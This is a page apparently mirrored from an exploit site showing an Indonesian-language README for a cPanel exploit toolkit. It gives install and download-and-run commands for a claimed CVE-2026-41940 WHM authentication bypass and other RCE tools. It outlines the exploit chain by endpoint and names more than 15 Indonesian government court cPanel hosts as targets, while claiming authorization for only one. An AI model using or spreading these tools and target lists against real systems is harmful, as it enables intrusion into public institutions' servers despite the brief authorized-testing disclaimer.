Share
## https://sploitus.com/exploit?id=2BCA0B75-E202-56BD-BF08-BAE0CA132681
# ๐Ÿฆ‰ Indo cPanel Exploit Toolkit

**โš ๏ธ FOR AUTHORIZED SECURITY TESTING ONLY**

Tools dan exploit untuk authorized penetration testing terhadap infrastruktur pemerintah Indonesia (.go.id). Hanya gunakan dengan izin tertulis.

## Quick Install

```bash
# Clone repo
git clone https://github.com/dikurdikur/indo-cpanel-exploit.git
cd indo-cpanel-exploit

# Run setup
./scripts/setup.sh
```

### Or download pre-built binary:

```bash
wget https://github.com/dikurdikur/indo-cpanel-exploit/releases/latest/download/cve-2026-41940
chmod +x cve-2026-41940
./cve-2026-41940 -u cpanel.target.go.id -p 2087
```

## Requirements

- Go 1.21+ (untuk compile exploit)
- curl, wget, git
- IP Indonesia (wajib โ€” target memblokir IP luar)

## Tools Included

| Tool | Deskripsi |
|------|-----------|
| `CVE-2026-41940` | cPanel WHM Auth Bypass via CRLF Injection |
| `CVE-2023-29489` | cPanel XSS โ†’ RCE |
| `cpanel-scanner` | Multi-target cPanel vulnerability scanner |
| `softploit` | Softaculous RCE exploit |

## Targets

15+ cPanel exposed di domain pemerintah Indonesia:
- cpanel.pa-banjarkota.go.id โ† PRIMARY TARGET
- cpanel.pa-bandung.go.id
- cpanel.pa-bogor.go.id
- cpanel.pa-ciamis.go.id
- cpanel.pa-cianjur.go.id
- ... (lihat `reports/cpanel_targets.txt`)

## Usage

### 1. Scan single target
```bash
./exploits/cve-2026-41940/cve-2026-41940 -u https://cpanel.target.go.id:2087
```

### 2. Scan all targets
```bash
./scripts/scan_all.sh
```

### 3. Generate report
```bash
./scripts/generate_report.sh
```

## CVE-2026-41940 Exploit Chain

```
Stage 1: Mint preauth session โ†’ POST /login/?login_only=1
Stage 2: CRLF injection โ†’ GET / + Authorization: Basic 
Stage 3: Propagate โ†’ /scripts2/listaccts
Stage 4: Verify root โ†’ /cpsess/json-api/version
```

## Authorized Targets

- โœ… pa-banjarkota.go.id (izin: 6 Mei - 10 Juni 2026)
- Target lain: sesuaikan scope dan izin

## Disclaimer

Tools ini dibuat untuk tujuan keamanan yang sah (authorized testing & responsible disclosure). Penggunaan tanpa izin adalah pelanggaran hukum.